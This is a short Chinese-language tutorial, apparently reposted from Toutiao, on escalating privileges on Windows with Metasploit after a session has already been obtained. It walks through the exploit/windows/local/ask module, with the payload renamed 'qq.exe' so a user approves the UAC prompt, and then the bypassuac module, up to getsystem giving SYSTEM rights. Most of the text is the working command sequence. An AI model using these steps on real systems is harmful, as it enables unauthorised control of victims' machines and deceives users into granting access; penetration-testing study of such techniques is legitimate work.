提权大致也就3种方法

1. 提高程序运行权限级别

2. Uac绕过

3. 提权漏洞

我这里先用第一种来演示

前提是msf已经获取到了 一个session

Getiud查看用户 是用户权限

Getsystem报错 看到是没法提权的

接下来 background退到后台

use exploit/windows/local/ask

加载模块

Show options

Set session 1

设置 session为 刚刚获取到得session

运行后会弹出 uac的拦截

Filename 可以设置文件的名字 伪装文件例如qq使得 用户点击确认

Set filename qq.Exe

接下来 run 运行 等待就可以了

接下来我们就可以看到靶机那边弹出用户控制的框

点击确定

在msf那边就可以获取到一个新的sesion

Getuid

还是用户权限

Getsystem

看到现在已经获取到了管理员权限

Msf绕过uac

use exploit/windows/local/bypassuac 再按几下tab键 可以看到绕过uac还是有很多模块和方法的 例如进程注入 vbs绕过等等

我这里直接用bypassuac模块

Show options

这里只需要设置个session就可以了

Set session 3

Run

执行成功

反弹回来一个session

Getuid

用户权限

Getsystem

Getuid

获取system权限成功

转载于：https://www.toutiao.com/a6792068953574212108/